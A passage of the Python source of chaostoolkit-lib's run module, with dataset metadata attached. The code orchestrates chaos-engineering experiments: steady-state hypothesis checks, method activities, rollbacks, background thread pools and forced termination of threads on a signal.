secrets,\n event_registry,\n dry,\n )\n\n journal[\"end\"] = datetime.utcnow().isoformat()\n journal[\"duration\"] = time.time() - started_at\n\n # the spec only allows these statuses, so if it's anything else\n # we override to \"completed\"\n if journal[\"status\"] not in (\n \"completed\",\n \"failed\",\n \"aborted\",\n \"interrupted\",\n ):\n journal[\"status\"] = \"completed\"\n\n has_deviated = journal[\"deviated\"]\n status = \"deviated\" if has_deviated else journal[\"status\"]\n logger.info(f\"Experiment ended with status: {status}\")\n if has_deviated:\n logger.info(\n \"The steady-state has deviated, a weakness may have been \"\n \"discovered\"\n )\n\n 
control.with_state(journal)\n try:\n control.end(\n \"experiment\", experiment, experiment, configuration, secrets\n )\n except ChaosException:\n logger.debug(\"Failed to close controls\", exc_info=True)\n finally:\n try:\n cleanup_controls(experiment)\n cleanup_global_controls()\n finally:\n event_registry.finish(journal)\n\n return journal\n\n\ndef should_run_before_method(strategy: Strategy) -> bool:\n return strategy in [Strategy.BEFORE_METHOD, Strategy.DEFAULT, Strategy.CONTINUOUS]\n\n\ndef should_run_after_method(strategy: Strategy) -> bool:\n return strategy in [Strategy.AFTER_METHOD, Strategy.DEFAULT, Strategy.CONTINUOUS]\n\n\ndef should_run_during_method(strategy: Strategy) -> bool:\n return strategy in [Strategy.DURING_METHOD, Strategy.CONTINUOUS]\n\n\ndef run_gate_hypothesis(\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n event_registry: EventHandlerRegistry,\n dry: Dry,\n) -> Dict[str, Any]:\n \"\"\"\n Run the hypothesis before the method and bail the execution if it did\n not pass.\n \"\"\"\n logger.debug(\"Running steady-state hypothesis before the method\")\n event_registry.start_hypothesis_before(experiment)\n state = run_steady_state_hypothesis(\n experiment, configuration, secrets, dry=dry, event_registry=event_registry\n )\n journal[\"steady_states\"][\"before\"] = state\n event_registry.hypothesis_before_completed(experiment, state, journal)\n if state is not None and not state[\"steady_state_met\"]:\n journal[\"steady_states\"][\"before\"] = state\n journal[\"status\"] = \"completed\"\n for probe in state.get(\"probes\", []):\n if probe[\"status\"] != \"succeeded\":\n journal[\"status\"] = \"failed\"\n break\n\n p = state[\"probes\"][-1]\n logger.fatal(\n \"Steady state probe '{p}' is not in the given \"\n \"tolerance so failing this experiment\".format(p=p[\"activity\"][\"name\"])\n )\n return\n return state\n\n\ndef run_deviation_validation_hypothesis(\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n event_registry: EventHandlerRegistry,\n dry: Dry,\n) -> Dict[str, Any]:\n \"\"\"\n Run the hypothesis after the method and report to the journal if the\n experiment has deviated.\n \"\"\"\n logger.debug(\"Running steady-state hypothesis after the method\")\n event_registry.start_hypothesis_after(experiment)\n state = run_steady_state_hypothesis(\n experiment, configuration, secrets, dry=dry, event_registry=event_registry\n )\n journal[\"steady_states\"][\"after\"] = state\n event_registry.hypothesis_after_completed(experiment, state, journal)\n if state is not None and not state[\"steady_state_met\"]:\n journal[\"deviated\"] = True\n journal[\"status\"] = \"completed\"\n for probe in state.get(\"probes\", []):\n if probe[\"status\"] != \"succeeded\":\n journal[\"status\"] = \"failed\"\n break\n\n p = state[\"probes\"][-1]\n logger.fatal(\n \"Steady state probe '{p}' is not in the \"\n \"given tolerance so failing this \"\n \"experiment\".format(p=p[\"activity\"][\"name\"])\n )\n return state\n\n\ndef run_hypothesis_during_method(\n hypo_pool: ThreadPoolExecutor,\n continuous_hypo_event: threading.Event,\n strategy: Strategy,\n schedule: Schedule,\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n event_registry: EventHandlerRegistry,\n dry: Dry,\n) -> Future:\n \"\"\"\n Run the hypothesis continuously in a background thread and report the\n status in the journal when it raised an exception.\n \"\"\"\n\n def completed(f: 
Future):\n exc = f.exception()\n event_registry.continuous_hypothesis_completed(experiment, journal, exc)\n if exc is not None:\n if isinstance(exc, InterruptExecution):\n journal[\"status\"] = \"interrupted\"\n logger.fatal(str(exc))\n elif isinstance(exc, Exception):\n journal[\"status\"] = \"aborted\"\n logger.fatal(str(exc))\n logger.info(\"Continuous steady state hypothesis terminated\")\n\n f = hypo_pool.submit(\n run_hypothesis_continuously,\n continuous_hypo_event,\n schedule,\n experiment,\n journal,\n configuration,\n secrets,\n event_registry,\n dry=dry,\n )\n f.add_done_callback(completed)\n return f\n\n\ndef run_method(\n strategy: Strategy,\n activity_pool: ThreadPoolExecutor,\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n event_registry: EventHandlerRegistry,\n dry: Dry,\n) -> Optional[List[Run]]:\n logger.info(\"Playing your experiment's method now...\")\n event_registry.start_method(experiment)\n try:\n runs = []\n journal[\"run\"] = runs\n apply_activities(\n experiment,\n configuration,\n secrets,\n activity_pool,\n journal,\n dry,\n event_registry,\n runs=runs,\n )\n event_registry.method_completed(experiment, runs)\n return runs\n except InterruptExecution:\n event_registry.method_completed(experiment)\n raise\n except Exception:\n journal[\"status\"] = \"aborted\"\n event_registry.method_completed(experiment)\n logger.fatal(\n \"Experiment ran into an un expected fatal error, \" \"aborting now.\",\n exc_info=True,\n )\n\n\ndef run_rollback(\n rollback_strategy: str,\n rollback_pool: ThreadPoolExecutor,\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n event_registry: EventHandlerRegistry,\n dry: Dry,\n) -> None:\n has_deviated = journal[\"deviated\"]\n journal_status = journal[\"status\"]\n play_rollbacks = False\n if rollback_strategy == \"always\":\n logger.warning(\"Rollbacks were explicitly requested to be played\")\n play_rollbacks = True\n elif rollback_strategy == \"never\":\n logger.warning(\"Rollbacks were explicitly requested to not be played\")\n play_rollbacks = False\n elif rollback_strategy == \"default\" and journal_status not in [\n \"failed\",\n \"interrupted\",\n ]:\n play_rollbacks = True\n elif rollback_strategy == \"deviated\":\n if has_deviated:\n logger.warning(\n \"Rollbacks will be played only because the experiment \" \"deviated\"\n )\n play_rollbacks = True\n else:\n logger.warning(\n \"Rollbacks were explicitely requested to be played \"\n \"only if the experiment deviated. 
Since this is not \"\n \"the case, we will not play them.\"\n )\n\n if play_rollbacks:\n event_registry.start_rollbacks(experiment)\n try:\n journal[\"rollbacks\"] = apply_rollbacks(\n experiment, configuration, secrets, rollback_pool, dry, event_registry\n )\n except InterruptExecution as i:\n journal[\"status\"] = \"interrupted\"\n logger.fatal(str(i))\n except (KeyboardInterrupt, SystemExit):\n journal[\"status\"] = \"interrupted\"\n logger.warning(\n \"Received an exit signal.\"\n \"Terminating now without running the \"\n \"remaining rollbacks.\"\n )\n finally:\n event_registry.rollbacks_completed(experiment, journal)\n\n\ndef initialize_run_journal(experiment: Experiment) -> Journal:\n return {\n \"chaoslib-version\": __version__,\n \"platform\": platform.platform(),\n \"node\": platform.node(),\n \"experiment\": experiment.copy(),\n \"start\": datetime.utcnow().isoformat(),\n \"status\": None,\n \"deviated\": False,\n \"steady_states\": {\"before\": None, \"after\": None, \"during\": []},\n \"run\": [],\n \"rollbacks\": [],\n }\n\n\ndef get_background_pools(experiment: Experiment) -> ThreadPoolExecutor:\n \"\"\"\n Create a pool for background activities. The pool is as big as the number\n of declared background activities. If none are declared, returned `None`.\n \"\"\"\n method = experiment.get(\"method\", [])\n rollbacks = experiment.get(\"rollbacks\", [])\n\n activity_background_count = 0\n for activity in method:\n if activity and activity.get(\"background\"):\n activity_background_count = activity_background_count + 1\n\n activity_pool = None\n if activity_background_count:\n logger.debug(\n \"{c} activities will be run in the background\".format(\n c=activity_background_count\n )\n )\n activity_pool = ThreadPoolExecutor(activity_background_count)\n\n rollback_background_pool = 0\n for activity in rollbacks:\n if activity and activity.get(\"background\"):\n rollback_background_pool = rollback_background_pool + 1\n\n rollback_pool = None\n if rollback_background_pool:\n logger.debug(\n \"{c} rollbacks will be run in the background\".format(\n c=rollback_background_pool\n )\n )\n rollback_pool = ThreadPoolExecutor(rollback_background_pool)\n\n return activity_pool, rollback_pool\n\n\ndef get_hypothesis_pool() -> ThreadPoolExecutor:\n \"\"\"\n Create a pool for running the steady-state hypothesis continuously in the\n background of the method. 
The pool is not bounded because we don't know\n how long it will run for.\n \"\"\"\n return ThreadPoolExecutor(max_workers=1)\n\n\ndef run_hypothesis_continuously(\n event: threading.Event,\n schedule: Schedule,\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n event_registry: EventHandlerRegistry,\n dry: Dry,\n):\n frequency = schedule.continuous_hypothesis_frequency\n fail_fast_ratio = schedule.fail_fast_ratio\n\n event_registry.start_continuous_hypothesis(frequency)\n logger.info(\n \"Executing the steady-state hypothesis continuously \"\n \"every {} seconds\".format(frequency)\n )\n\n failed_iteration = 0\n failed_ratio = 0\n iteration = 1\n while not event.is_set():\n # already marked as terminated, let's exit now\n if journal[\"status\"] in [\"failed\", \"interrupted\", \"aborted\"]:\n break\n\n state = run_steady_state_hypothesis(\n experiment, configuration, secrets, dry=dry, event_registry=event_registry\n )\n journal[\"steady_states\"][\"during\"].append(state)\n event_registry.continuous_hypothesis_iteration(iteration, state)\n\n if state is not None and not state[\"steady_state_met\"]:\n failed_iteration += 1\n failed_ratio = (failed_iteration * 100) / iteration\n p = state[\"probes\"][-1]\n logger.warning(\n \"Continuous steady state probe '{p}' is not in the given \"\n \"tolerance\".format(p=p[\"activity\"][\"name\"])\n )\n\n if schedule.fail_fast:\n if failed_ratio >= fail_fast_ratio:\n m = \"Terminating immediately the experiment\"\n if failed_ratio != 0.0:\n m = \"{} after {:.1f}% hypothesis deviated\".format(\n m, failed_ratio\n )\n logger.info(m)\n journal[\"status\"] = \"failed\"\n break\n iteration += 1\n\n # we do not adjust the frequency based on the time taken by probes\n # above. We really want frequency seconds between two iteration\n # not frequency as a total time of a single iteration\n event.wait(timeout=frequency)\n\n\ndef apply_activities(\n experiment: Experiment,\n configuration: Configuration,\n secrets: Secrets,\n pool: ThreadPoolExecutor,\n journal: Journal,\n dry: Dry,\n event_registry: EventHandlerRegistry,\n runs: List[Run],\n) -> None:\n with controls(\n level=\"method\",\n experiment=experiment,\n context=experiment,\n configuration=configuration,\n secrets=secrets,\n ) as control:\n futures = []\n wait_for_background_activities = True\n\n try:\n for activity in run_activities(\n experiment,\n configuration,\n secrets,\n pool,\n dry,\n event_registry,\n runs,\n ):\n if isinstance(activity, Future):\n futures.append(activity)\n if journal[\"status\"] in [\"aborted\", \"failed\", \"interrupted\"]:\n break\n except SystemExit as x:\n # when we got a signal for an ungraceful exit, we can decide\n # not to wait for background activities. 
Their statuses will\n # remain failed.\n wait_for_background_activities = x.code != 30 # see exit.py\n raise\n finally:\n control.with_state(runs)\n\n if wait_for_background_activities and pool:\n logger.debug(\"Waiting for background activities to complete\")\n pool.shutdown(wait=True)\n elif pool:\n harshly_terminate_pending_background_activities(pool)\n logger.debug(\n \"Do not wait for the background activities to finish \"\n \"as per signal\"\n )\n\n for f in futures:\n try:\n if f.running():\n f.result(timeout=0.2)\n except TimeoutError:\n pass\n\n pool.shutdown(wait=False)\n\n\ndef apply_rollbacks(\n experiment: Experiment,\n configuration: Configuration,\n secrets: Secrets,\n pool: ThreadPoolExecutor,\n dry: Dry,\n event_registry: EventHandlerRegistry,\n) -> List[Run]:\n logger.info(\"Let's rollback...\")\n with controls(\n level=\"rollback\",\n experiment=experiment,\n context=experiment,\n configuration=configuration,\n secrets=secrets,\n ) as control:\n rollbacks = list(\n run_rollbacks(experiment, configuration, secrets, pool, dry, event_registry)\n )\n\n if pool:\n logger.debug(\"Waiting for background rollbacks to complete...\")\n pool.shutdown(wait=True)\n\n result = []\n for rollback in rollbacks:\n if not rollback:\n continue\n if isinstance(rollback, dict):\n result.append(rollback)\n else:\n result.append(rollback.result())\n\n control.with_state(result)\n\n return result\n\n\ndef has_steady_state_hypothesis_with_probes(experiment: Experiment) -> bool:\n steady_state_hypothesis = experiment.get(\"steady-state-hypothesis\")\n if steady_state_hypothesis:\n probes = steady_state_hypothesis.get(\"probes\")\n if probes:\n return len(probes) > 0\n return False\n\n\ndef harshly_terminate_pending_background_activities(pool: ThreadPoolExecutor) -> None:\n \"\"\"\n Ugly hack to try to force background activities to terminate now.\n\n This can only have an impact over functions that are still in the Python\n land. Any code outside of the Python VM (say calling a C function, even\n time.sleep()) will not be impacted and therefore will continue hanging\n until it does complete of its own accord.\n\n This could have really bizarre side effects so it's only applied when\n a SIGUSR2 signal was received.\n \"\"\"\n if not HAS_CTYPES:\n logger.debug(\n \"Your Python implementation does not provide the `ctypes` \"\n \"module and we cannot terminate very harshly running background \"\n \"activities.\"\n )\n return\n\n logger.debug(\n \"Harshly trying to interrupt remaining background activities still \" \"running\"\n )\n\n # oh and of course we use private properties... 
might as well when trying\n # to be ugly\n for thread in pool._threads:\n tid = ctypes.c_long(thread.ident)\n try:\n gil = ctypes.pythonapi.PyGILState_Ensure()\n ctypes.pythonapi.PyThreadState_SetAsyncExc(\n tid, ctypes.py_object(ExperimentExitedException)\n )\n finally:\n ctypes.pythonapi.PyGILState_Release(gil)\n", "repo_name": "chaostoolkit/chaostoolkit-lib", "sub_path": "chaoslib/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 34474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 77, "dataset": "github-code", "pt": "53", "api": [{"api_name": "abc.ABCMeta", "line_number": 55, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 63, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 63, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 68, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 69, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 70, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 71, "usage_type": "name"}, {"api_name": "chaoslib.types.Schedule", "line_number": 72, "usage_type": "name"}, {"api_name": "chaoslib.types.Settings", "line_number": 73, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 77, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 80, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 80, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 89, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 93, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 93, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 97, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 101, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 101, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 105, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 109, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 109, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 113, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 116, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 116, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 119, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 122, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 122, "usage_type": "name"}, {"api_name": "chaoslib.types.Activity", "line_number": 131, "usage_type": "name"}, {"api_name": "chaoslib.types.Activity", "line_number": 134, "usage_type": "name"}, {"api_name": "chaoslib.types.Run", "line_number": 134, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 145, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 145, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 150, "usage_type": 
"call"}, {"api_name": "logzero.logger", "line_number": 150, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 154, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 155, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 156, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 157, "usage_type": "name"}, {"api_name": "chaoslib.types.Schedule", "line_number": 158, "usage_type": "name"}, {"api_name": "chaoslib.types.Settings", "line_number": 159, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 167, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 167, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 169, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 174, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 174, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 176, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 176, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 181, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 181, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 188, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 188, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 195, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 195, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 197, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 202, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 202, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 205, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 205, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 211, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 211, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 213, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 218, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 218, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 221, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 221, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 221, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 221, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 227, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 227, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 229, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 234, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 234, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 237, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 237, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 237, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 237, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 243, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 243, "usage_type": "name"}, 
{"api_name": "chaoslib.types.Experiment", "line_number": 245, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 250, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 250, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 252, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 252, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 257, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 257, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 259, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 264, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 264, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 266, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 266, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 271, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 271, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 278, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 278, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 285, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 285, "usage_type": "name"}, {"api_name": "chaoslib.types.Activity", "line_number": 287, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 292, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 292, "usage_type": "name"}, {"api_name": "chaoslib.types.Activity", "line_number": 294, "usage_type": "name"}, {"api_name": "chaoslib.types.Run", "line_number": 294, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 299, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 299, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy", "line_number": 303, "usage_type": "name"}, {"api_name": "chaoslib.types.Schedule", "line_number": 303, "usage_type": "name"}, {"api_name": "chaoslib.types.Schedule", "line_number": 305, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 311, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 319, "usage_type": "name"}, {"api_name": "chaoslib.types.Settings", "line_number": 320, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 321, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 321, "usage_type": "name"}, {"api_name": "chaoslib.settings.get_loaded_settings", "line_number": 324, "usage_type": "call"}, {"api_name": "chaoslib.configuration.load_configuration", "line_number": 325, "usage_type": "call"}, {"api_name": "chaoslib.secret.load_secrets", "line_number": 328, "usage_type": "call"}, {"api_name": "chaoslib.configuration.load_dynamic_configuration", "line_number": 331, "usage_type": "call"}, {"api_name": "chaoslib.types.Experiment", "line_number": 338, "usage_type": "name"}, {"api_name": "chaoslib.types.Settings", "line_number": 339, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 340, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 340, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 341, "usage_type": "name"}, {"api_name": "chaoslib.exit.exit_signals", "line_number": 344, "usage_type": "call"}, {"api_name": "chaoslib.types.Journal", "line_number": 342, "usage_type": "name"}, 
{"api_name": "chaoslib.types.Strategy", "line_number": 359, "usage_type": "name"}, {"api_name": "chaoslib.types.Schedule", "line_number": 360, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 361, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 362, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 363, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 364, "usage_type": "name"}, {"api_name": "chaoslib.types.Settings", "line_number": 365, "usage_type": "name"}, {"api_name": "chaoslib.substitute", "line_number": 368, "usage_type": "call"}, {"api_name": "logzero.logger.info", "line_number": 369, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 369, "usage_type": "name"}, {"api_name": "time.time", "line_number": 371, "usage_type": "call"}, {"api_name": "chaoslib.control.Control", "line_number": 375, "usage_type": "call"}, {"api_name": "threading.Event", "line_number": 378, "usage_type": "call"}, {"api_name": "chaoslib.types.Dry", "line_number": 381, "usage_type": "argument"}, {"api_name": "logzero.logger.warning", "line_number": 382, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 382, "usage_type": "name"}, {"api_name": "chaoslib.control.initialize_global_controls", "line_number": 383, "usage_type": "call"}, {"api_name": "chaoslib.control.initialize_controls", "line_number": 386, "usage_type": "call"}, {"api_name": "chaoslib.types.Strategy.DEFAULT", "line_number": 394, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy", "line_number": 394, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 396, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 396, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 400, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 400, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy.SKIP", "line_number": 405, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy", "line_number": 405, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 408, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 408, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 412, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 412, "usage_type": "name"}, {"api_name": "chaoslib.exceptions.InterruptExecution", "line_number": 467, "usage_type": "name"}, {"api_name": "logzero.logger.fatal", "line_number": 469, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 469, "usage_type": "name"}, {"api_name": "logzero.logger.warning", "line_number": 473, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 473, "usage_type": "name"}, {"api_name": "logzero.logger.warning", "line_number": 477, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 477, "usage_type": "name"}, {"api_name": "logzero.logger.warning", "line_number": 481, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 481, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 500, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 500, "usage_type": "name"}, {"api_name": "time.time", "line_number": 501, "usage_type": "call"}, {"api_name": "logzero.logger.info", "line_number": 515, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 515, "usage_type": "name"}, 
{"api_name": "logzero.logger.info", "line_number": 517, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 517, "usage_type": "name"}, {"api_name": "chaoslib.exceptions.ChaosException", "line_number": 527, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 528, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 528, "usage_type": "name"}, {"api_name": "chaoslib.control.cleanup_controls", "line_number": 531, "usage_type": "call"}, {"api_name": "chaoslib.control.cleanup_global_controls", "line_number": 532, "usage_type": "call"}, {"api_name": "chaoslib.types.Strategy", "line_number": 539, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy.BEFORE_METHOD", "line_number": 540, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy", "line_number": 540, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy.DEFAULT", "line_number": 540, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy.CONTINUOUS", "line_number": 540, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy", "line_number": 543, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy.AFTER_METHOD", "line_number": 544, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy", "line_number": 544, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy.DEFAULT", "line_number": 544, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy.CONTINUOUS", "line_number": 544, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy", "line_number": 547, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy.DURING_METHOD", "line_number": 548, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Strategy", "line_number": 548, "usage_type": "name"}, {"api_name": "chaoslib.types.Strategy.CONTINUOUS", "line_number": 548, "usage_type": "attribute"}, {"api_name": "chaoslib.types.Experiment", "line_number": 552, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 553, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 554, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 555, "usage_type": "name"}, {"api_name": "chaoslib.types.Dry", "line_number": 557, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 563, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 563, "usage_type": "name"}, {"api_name": "chaoslib.hypothesis.run_steady_state_hypothesis", "line_number": 565, "usage_type": "call"}, {"api_name": "logzero.logger.fatal", "line_number": 579, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 579, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 558, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 558, "usage_type": "name"}, {"api_name": "chaoslib.types.Experiment", "line_number": 588, "usage_type": "name"}, {"api_name": "chaoslib.types.Journal", "line_number": 589, "usage_type": "name"}, {"api_name": "chaoslib.types.Configuration", "line_number": 590, "usage_type": "name"}, {"api_name": "chaoslib.types.Secrets", "line_number": 591, "usage_type": "name"}, {"api_name": "chaoslib.types.Dry", "line_number": 593, "usage_type": "name"}, {"api_name": "logzero.logger.debug", "line_number": 599, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 599, "usage_type": "name"}, {"api_name": "chaoslib.hypothesis.run_steady_state_hypothesis", "line_number": 601, "usage_type": "call"}, {"api_name": 
